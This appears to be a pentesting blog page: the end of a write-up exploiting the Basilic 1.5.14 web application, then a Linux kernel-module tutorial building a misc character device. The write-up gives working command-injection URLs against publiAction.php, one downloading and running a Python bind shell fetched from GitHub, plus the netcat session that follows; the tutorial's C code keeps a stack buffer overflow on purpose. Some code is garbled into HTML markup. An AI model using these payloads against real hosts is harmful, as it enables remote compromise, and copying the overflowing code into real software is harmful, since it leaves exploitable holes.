[email protected]:/var/www/basilic-1.5.14# chown -R www-data:www-data ../Publications
```

After the author is added and the `Publications` directory is created you can fill out the form with dummy data. Before I send it I put a single quote (`'`) in one of the fields so that the query breaks:

[image: /assets/images/web-hacking/basilic-found-sqli2.png]

This is the request that was sent to get this error:

[image: /assets/images/web-hacking/basilic-found-sqli2-req.png]

As you can see, we don't seem to have any control over the `bibTex` field, but we do control the `entry` field (here we have sent `Article`), which in the query is just before the `bibTex` field.

Using this knowledge we can insert a command here and look for where we can run it:

[image: /assets/images/web-hacking/basilic-test-sqli2.png]

To test this command injection we need to run one of those scripts. If you remember, the file was called `updatePubliDocs.php`, so we can assume it has something to do with updating; when you try to edit the publication, there is an update button:

[image: /assets/images/web-hacking/basilic-publication-edit.png]

After you fill in a `title` and click `update` you should have the following screen:

[image: /assets/images/web-hacking/basilic-publication-edit2.png]

And checking the `/tmp` directory, we can see that it has in fact worked:

```
[email protected]:/var/www/basilic-1.5.14# ls -l /tmp/
total 44
-rw-r--r-- 1 www-data www-data 30620 Jun  3 15:11 basilic-log.txt
-rw-r--r-- 1 root     root     11857 Jun  3 12:42 basilic.original
-rw-rw-rw- 1 www-data www-data     0 Jun  3 15:11 test.txt
```

Developing The Exploit

Now that we have confirmed a command injection it is time to start developing the exploit.

The request that we sent to run the command was this:

[image: /assets/images/web-hacking/basilic-test-cmdi2-req.png]

As we can see, we control the `previousBibTex` field, so we might not be limited to 20 characters and might not need to insert the data into the database first. Let's test this by putting the following as the URL:

`http://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=update&authorList=2&previousBibTex=%3Btouch+%2Ftmp%2Fthis-is-a-ridiculously-long-file-name-more-than-20-characters.txt&previousYear=0000&id=2&entry=Article&name=&title=1&year=2015&selectFill=&journal=2&volume=&number=&pages=&month=&optkey=&keywords=&note=`

This is the same as the actual request except we are trying to run the command `touch /tmp/this-is-a-ridiculously-long-file-name-more-than-20-characters.txt` instead of `touch /tmp/test.txt`:

[image: /assets/images/web-hacking/basilic-test-cmdi3.png]

And checking the `/tmp` directory again:

```
[email protected]:/var/www/basilic-1.5.14# ls -l /tmp/
total 44
-rw-r--r-- 1 www-data www-data 32400 Jun  3 15:33 basilic-log.txt
-rw-r--r-- 1 root     root     11857 Jun  3 12:42 basilic.original
-rw-rw-rw- 1 www-data www-data     0 Jun  3 15:13 test.txt
-rw-r--r-- 1 www-data www-data     0 Jun  3 15:33 this-is-a-ridiculously-long-file-name-more-than-20-characters.txt
```

So now we aren't limited to 20 characters any more, and we only need to make 1 request per command.

We need to check for a few tools on the system to see how we can get command line access, so browse to the following URL:

`http://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=update&authorList=2&previousBibTex=%3Bnc%20-h%202>%20%2Fvar%2Fwww%2Ftools.txt%3Bpython%20-V%202>>%20%2Fvar%2Fwww%2Ftools.txt%3B&previousYear=0000&id=2&entry=Article&name=&title=1&year=2015&selectFill=&journal=2&volume=&number=&pages=&month=&optkey=&keywords=&note=`

Here we are running `;nc -h 2> /var/www/tools.txt;python -V 2>> /var/www/tools.txt;`; each command is separated by a semicolon (`;`).

Then browse to `http://dev/tools.txt`. You should see something like this:

[image: /assets/images/web-hacking/basilic-cmdi-tools.png]

As you can see, we have both netcat (http://netcat.sourceforge.net/) and python (https://www.python.org/) 2.7.3 installed. As the actual server is running Ubuntu, and Ubuntu's version of netcat doesn't have the `-e` option, I'll use python here.

This URL will download a python bind shell that we can connect to, and then run it:

`http://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=update&authorList=2&previousBibTex=%3Bwget%20-O%20%2Ftmp%2Fbind.py%20https://raw.githubusercontent.com/s7ephen/Tamatebako/master/bindshell.py%3Bpython%20%2Ftmp%2Fbind.py%3B&previousYear=0000&id=2&entry=Article&name=&title=1&year=2015&selectFill=&journal=2&volume=&number=&pages=&month=&optkey=&keywords=&note=`

This is running `;wget -O /tmp/bind.py https://raw.githubusercontent.com/s7ephen/Tamatebako/master/bindshell.py;python /tmp/bind.py;` to download the bind shell with wget (https://www.gnu.org/software/wget/), saving it to `/tmp/bind.py` and running it with the python interpreter.

This bind shell listens on port 2400 and has the password `mtso`. Thanks to `s7ephen` for the bind shell; here is his website (http://dontstuffbeansupyournose.com/).

After the request is sent we can use netcat to connect to it:

```
[email protected]:~$ nc dev 2400
[8731] bindshell on port 2400
password? mtso
[email protected]:/var/www/basilic-1.5.14/Intranet/Publications$ ls -l
ls -l
total 44
-rw-r--r-- 1 www-data www-data   227 Jun  3 12:42 index.html
-rw-r--r-- 1 www-data www-data  2549 Jun  3 12:42 menuPubli.php
-rw-r--r-- 1 www-data www-data 17212 Jun  3 12:42 publi.php
-rw-r--r-- 1 www-data www-data  8836 Jun  3 12:42 publiAction.php
-rw-r--r-- 1 www-data www-data  2529 Jun  3 12:42 updatePublis.php
```

Running this as is (just changing the host part of the URL) against the target machine works perfectly.

Conclusion

This application was one of the most poorly written applications I've ever seen. There are vulnerabilities at every turn and no attempt seems to have been made to fix them.

I would advise against using this application anywhere except for testing your pentesting skills.

Lastly I'd like to add that the command injection vulnerability I found isn't actually in the `updatePubliDocs.php` file, or even in a call to the `system` PHP function. So as well as looking for where the vulnerability I found actually was (Hint: it's in a call to the `exec` PHP function), there is still probably another command injection vulnerability in the calls to `system`.

This was a fun challenge.

Happy Hacking :-)

A Simple Character Device

6 June 2014 at 13:55
By: 0xe7
This is the second post on Linux kernel hacking. In the first post (/linux-kernel-hacking/2014/05/10/first-lkm/) we created a basic Linux kernel module (LKM), but that module didn't do anything except write a message to the system log on load and unload.

Now we will extend it to create a device which we can use to communicate with the LKM. Besides dedicated system calls, device files are how userland applications talk to code running in kernel space: a program opens, reads and writes the device file with the ordinary file system calls, and the kernel routes each call to the driver that owns the device.

What Is A Device File

There are two main types of device file, character devices and block devices. A block device is accessed in fixed-size blocks through the kernel's block layer and page cache, so it is buffered (a write is not pushed to the underlying device straight away, and you don't know how long it will take before it is) and it supports random access. A character device is accessed as a stream of bytes: reads and writes can be of any size and are passed straight to the driver, and whether seeking means anything at all is up to that driver.

We will be using a character device because it is simpler to understand (we use the device file in exactly the same way that we would use a regular file), we have no need for random access to the device, and it gives us direct access to the driver.

When viewed using `ls -l` a character device has `c` as the first letter of the mode, while a block device has a `b`:

```console
[email protected]:~# ls -l /dev/console
crw------- 1 root root 5, 1 May 29 12:07 /dev/console
[email protected]:~# stat /dev/console
  File: `/dev/console'
  Size: 0               Blocks: 0          IO Block: 4096   character special file
Device: 5h/5d   Inode: 1466        Links: 1     Device type: 5,1
Access: (0600/crw-------)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2014-05-29 12:06:54.303999993 +0100
Modify: 2014-05-29 12:07:28.303999993 +0100
Change: 2014-05-29 12:06:54.303999993 +0100
 Birth: -
```

The `ls` output shows the `c` and, where a regular file would show its size, the device's major and minor numbers (5 and 1). `stat` shows the same pair in its `Device type:` field, along with the inode number and the I/O block size.

A device file carries no data of its own; everything that identifies it is its type (character or block) and the major/minor pair. So if you delete it with `rm /dev/console` you can recreate it with `mknod /dev/console c 5 1` (`c` is for character device). I will demonstrate this later with our custom character device.

The major and minor numbers, together with the type, identify a device. The major number selects the driver that will be called to perform the input/output operation.
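The information that `ls` and `stat` print above is read from the node's inode and is exactly what `mknod` needs to recreate it. The following is an added example, not code from the original post: it inspects a path, reports whether it is a character or block device together with its major/minor pair, and builds the `mknod` command line that would recreate it. It assumes a Linux system with glibc (the `major()`/`minor()`/`makedev()` macros come from `sys/sysmacros.h`) and uses `/dev/null` as the default path; the struct and function names are my own.

```c
/*
 * devnode.c: added example (not from the original post). Reads the type and
 * major/minor pair of a device node the way ls and stat do, and prints the
 * mknod command that would recreate it. Assumes Linux/glibc; /dev/null is
 * only the default sample path.
 */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#ifdef __linux__
#include <sys/sysmacros.h>   /* major(), minor(), makedev() */
#endif

struct devnode {
    char type;           /* 'c' character, 'b' block, 0 if the path is not a device */
    unsigned int major;  /* selects the driver */
    unsigned int minor;  /* meaning is up to that driver */
};

/* Split a dev_t into the major/minor pair the kernel dispatches on. */
void split_dev(dev_t dev, unsigned int *maj, unsigned int *mnr)
{
    *maj = major(dev);
    *mnr = minor(dev);
}

/* Fill out from the inode at path. Returns 0 on success, -1 if stat fails. */
int inspect_devnode(const char *path, struct devnode *out)
{
    struct stat st;

    memset(out, 0, sizeof(*out));
    if (stat(path, &st) != 0)
        return -1;

    if (S_ISCHR(st.st_mode))
        out->type = 'c';
    else if (S_ISBLK(st.st_mode))
        out->type = 'b';
    else
        return 0;            /* regular file, directory, ...: not a device node */

    /* st_rdev is the device this node refers to; st_dev would be the
     * filesystem that holds the inode, which is a different thing. */
    split_dev(st.st_rdev, &out->major, &out->minor);
    return 0;
}

/* Build the mknod command line that recreates the node. Returns the length
 * written, or -1 if the path is not a device node. */
int mknod_command(const char *path, const struct devnode *d, char *buf, size_t len)
{
    if (d->type == 0)
        return -1;
    return snprintf(buf, len, "mknod %s %c %u %u", path, d->type, d->major, d->minor);
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/dev/null";
    struct devnode d;
    char cmd[256];

    if (inspect_devnode(path, &d) != 0) {
        perror(path);
        return 1;
    }
    if (mknod_command(path, &d, cmd, sizeof(cmd)) < 0) {
        printf("%s is not a device node\n", path);
        return 1;
    }
    printf("%s: type %c major %u minor %u\n", path, d.type, d.major, d.minor);
    printf("recreate with: %s\n", cmd);
    return 0;
}
```

Run as `./devnode /dev/console` it prints `mknod /dev/console c 5 1`. The kernel only ever looks at the type and the major/minor pair, so a node created with `mknod` anywhere in the filesystem gives the same access to the driver as the one under `/dev`; that is why audits for unexpected device nodes (inside container images, for example) compare exactly these values rather than the path.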
The minor number is implementation defined, basically its up to the driver what the minor number means, it is just passed as an argument./p h2Building Our Character Device/h2 pFor our character device we will implement a basic device which will take a string as an input (when the device file is written to), reverse the words of the string (any string of characters without a space is considered a word here) and output the reversed string when the device file is read from./p pIn Linux there is a generic character device called codemisc/code implemented in the kernel, this is the device we will use to create our character device./p pThe advantage here is that the codemisc/code device deals with the initialisation and cleanup of the device so we can just concentrate on the functionality of it. The major number of the codemisc/code device is 10, we can confirm this later once we have created ours and is codedrivers/char/misc.c/code in the kernel source./p pEvery device requires a file_operations a href="https://en.wikipedia.org/wiki/Struct_%28C_programming_language%29" target="_blank"struct/a, this defines what functions are run when certain actions are performed on the devices file, it is defined in codeincludes/linux/fs.h/code (so we will need to include this header file) as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="k"struct/span span 
class="nc"file_operations/spanspan class="w" /spanspan class="n"__fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"owner/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"THIS_MODULE/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"open/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"__fops/spanspan class="w" /spanspan class="err"##/spanspan class="w" /spanspan class="n"_open/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"release/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_release/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"read/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_read/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"write/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_write/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"llseek/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"generic_file_llseek/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pYou don't need to use all of these, only the ones that you will require based on what you want to do with your device. 
We only want to do something particular when we read from or write to the device file so our file_operations struct will be like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/span span class="nc"file_operations/spanspan class="w" /spanspan class="n"reverse_fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"read/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_read/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"write/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_write/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAll of the functions will contain the name codereverse/code which is what our character device will be called due to the nature of what it does, although the actual names are irrelevant./p pHere we are telling the kernel that when a read happens on our device file we want to run the function codereverse_read/code (on line 2) and when a write happens we want to run the function codereverse_write/code (on line 3)./p pWe will use this struct inside our codemiscdevice/code struct. 
The codemiscdevice/code struct is defined in codeinclude/linux/miscdevice.h/code (so we will also need to include this header file) as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"minor/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"name/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="k"struct/span span class="nc"file_operations/spanspan class="w" /spanspan class="o"*/spanspan class="n"fops/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"list_head/spanspan class="w" /spanspan class="n"list/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"device/spanspan class="w" /spanspan class="o"*/spanspan class="n"parent/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span 
class="w" /spanspan class="k"struct/span span class="nc"device/spanspan class="w" /spanspan class="o"*/spanspan class="n"this_device/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"nodename/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"umode_t/spanspan class="w" /spanspan class="n"mode/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAgain, here we only need codeminor/code, codename/code and codefops/code. So ours will be defined as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="n"reverse_misc_device/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"minor/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"MISC_DYNAMIC_MINOR/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"name/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;reversequot;/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan 
class="n"fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"reverse_fops/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pIn the codeinclude/linux/miscdevice.h/code header, the a href="http://www.cprogrammingexpert.com/C/Tutorial/fundamentals/symbolic_constant_c_programming_language.aspx" target="_blank"symbolic constant/a codeMISC_DYNAMIC_MINOR/code is defined as code255/code, this means it will pick the next avaliable minor number./p pNow we should ensure our device is registered and unregistered when our LKM is loaded and unloaded respectively. The codeinclude/linux/miscdevice.h/code header also includes the declaration of 2 functions that will help us here, codemisc_register/code and codemisc_deregister/code, and they are decleared as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"extern/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"misc_register/spanspan class="p"(/spanspan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="o"*/spanspan class="w" /spanspan class="n"misc/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="k"extern/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"misc_deregister/spanspan class="p"(/spanspan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="o"*/spanspan class="n"misc/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSo they both take 1 argument, the miscdevice struct created earlier. 
Other than this our LKM doesn't need to do anything else, so the initialization and exit functions can be written like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="n"reverse_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_register/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="n"reverse_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan 
class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_deregister/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNext we need to develop the functionality, for this I wrote a normal a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a application to make sure it was all working:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span 
class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan 
class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="mi"513/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;No dataquot;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"insert_word/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan 
class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"n/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memset/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="k"sizeof/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcpy/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan 
class="n"data/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcat/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"reverse/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span 
```c
    for (i = strlen(tmpdata)-1, c = 0; i >= 0; i--, c++) {
        if (tmpdata[i] == ' ') {
            word[c] = '\0';
            insert_word(word, n);
            n += 1;
            c = -1;
        } else
            word[c] = tmpdata[i];

    }
    word[c] = '\0';
    insert_word(word, n);
    data[strlen(tmpdata)] = '\0';
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        printf("Usage: %s <string>\n", argv[0]);
        exit(1);
    }

    printf("Before: %s\n", data);
    reverse(argv[1]);
    printf("After: %s\n", data);
}
```

Some of you should have noticed the [buffer overflow](https://en.wikipedia.org/wiki/Buffer_overflow) in this application; if you haven't, check out my [x86-32 linux](/categories/x86-32-linux.html) section. You can write an exploit for this application and figure out how to get a shell.
The character device will have a buffer overflow too (in the LKM, `reverse_write` copies `count` bytes from userland into a `DEVICE_SIZE+1` byte stack buffer without ever checking `count`), but we're not too worried about this as we are the only people who are going to be using it; if you wanted to secure this application you would just add another counter that always increments and break out of the loop when it reaches 512.

Anyway, testing this application shows that it seems to work fine:

```console
root@host:~/lkms# gcc -o reverse-test-app reverse-test-app.c
root@host:~/lkms# ./reverse-test-app "this is a test application"
Before: No data
After: application test a is this
root@host:~/lkms# ./reverse-test-app "application test a is this"
Before: No data
After: this is a test application
```

Obviously our "datastore" only holds the data while the application is running, so it isn't permanent, but the "datastore" in the LKM will be.
